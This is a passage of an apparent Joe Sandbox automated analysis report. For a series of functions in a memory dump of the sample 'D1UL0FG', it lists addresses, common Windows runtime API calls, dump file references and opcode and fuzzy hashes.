                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                          • Instruction ID: 06daeb1e8a4e174833dba9043aad17d5c891e2897e43f9227b117fac3d77211b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E512763B6D24286F768BA69940067A63D1BF44BA4F144774DD6CC77E6CF3CE501A600
                                                                                                                                                                                                                                          Function 00007FF67AEEC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction ID: 17fbc5e42ef2ef668aba8c102dc3d77ba500191a4eb61843f959d7192d02d942
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E11016372CA8181EA10AB25B8000696361FB85BF4F544371EEBD8B7F8CF3CD0418740
                                                                                                                                                                                                                                          Function 00007FF67AEEA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                          • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                          • Instruction ID: 85646e51a839b81afbd78bedd12939bfff1ff64ce7cfa50efb23786e544f88fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E08C53F3D24282FF487BF2B8551381391AF88B41F0480B8C81DC72B2EE2DA885A700
                                                                                                                                                                                                                                          Function 00007FF67AEEABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF67AEEAA45,?,?,00000000,00007FF67AEEAAFA), ref: 00007FF67AEEAC36
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF67AEEAA45,?,?,00000000,00007FF67AEEAAFA), ref: 00007FF67AEEAC40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                          • Instruction ID: 62ec347c2cdc8720c7d5a1dc495eaf9659d4a608cb08c976f3b13fa9f078f71d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60217513F3C68242FE947761A49427D17929F84BA1F4842BDDA2EC77F5CE6CE445A300
                                                                                                                                                                                                                                          Function 00007FF67AEEBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                          • Instruction ID: b194837250b3535b1dad5bfe3d63449e99ff124642fe13a609af642c13a671e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36410333A2C20187FA34AB19E45027977A0EB55B91F104275DACEC76E1CF2DF442EB91
                                                                                                                                                                                                                                          Function 00007FF67AED7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                          • Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                          • Instruction ID: 4b10d89de6633b26b97da5fb080bcc8084afead2998eb4522735428833d85c4d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D212923B2C65145FA10BB2265147BAA751BF85FC4F9C5070EE0C8B796CE7DE041E700
                                                                                                                                                                                                                                          Function 00007FF67AEEB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                          • Instruction ID: aac1e15759fa5fca7e925e730cdfdce3b95f6b90006f6ca5f4228a464ba1c823
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7331AE33E3C64285FB517B65984137C2750AB40B94F4282B5E9AD833F2DF7DE851A720
                                                                                                                                                                                                                                          Function 00007FF67AEE99D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                                          • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                          • Instruction ID: 895fc138cd33cb66834ce7649777255af0e280a7022b29f3675b4ed77fa86463
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78218E32A287828AFB64AF64C4442FC33E4EB04718F444679E62D86AE5DF38D594DB40
                                                                                                                                                                                                                                          Function 00007FF67AEE6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction ID: 22817d08d890a1a2226241b1902e71ad2f3a58f59e8328b87c6d5a7b5bd475b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96115123A3C64181FA60BF51A41027EA3A4BF45B80F5540B5EB4CD7AB6DF7DD940E750
                                                                                                                                                                                                                                          Function 00007FF67AEF63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction ID: 90f5500a99a89a37c7e31c2ff7eb5a24c73b0e9f0b58a75dbb753a7c7154c6e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50216573628AC287D7A1AF18E44037977A0FB84B54F544278EA9DC76E9DF3DD4049B01
                                                                                                                                                                                                                                          Function 00007FF67AEE042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction ID: 67d57be4f972b6edd41dcb2f958cc587ff1bbeb1c7af30665da0a5d1d4954090
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6801C463A6C74140FA04FF529A01069A7E1BF85FE0F0846B1EE5C97BE6DE3CE501A300
                                                                                                                                                                                                                                          Function 00007FF67AEE7F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                          • Instruction ID: b5daa2ec06f45799ee1bbfcbe188ddbe3d60b09e49ad2efd48fc9f0d358ebc73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC016922E3D68280FF607BA5A9011796390AF047E0F5445B9EA1CC37E6EF2CA841EA11
                                                                                                                                                                                                                                          Function 00007FF67AEE82A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                          • Instruction ID: 7aa3b2915cab1a240d5b691576304de02680a5e4e5b1c56bc4c4a67e40677038
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADE012A3E3CA4786F7143BB8458617913505FA9741F4154F4E908E63F3DF2D6849B721
                                                                                                                                                                                                                                          Function 00007FF67AEEEC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF67AEEB39A,?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA), ref: 00007FF67AEEEC5D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                          • Instruction ID: 4f2edcf9cc4e26ee22f3682bb768c12c1c08652d4aed9a35be88a98b7cce543d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
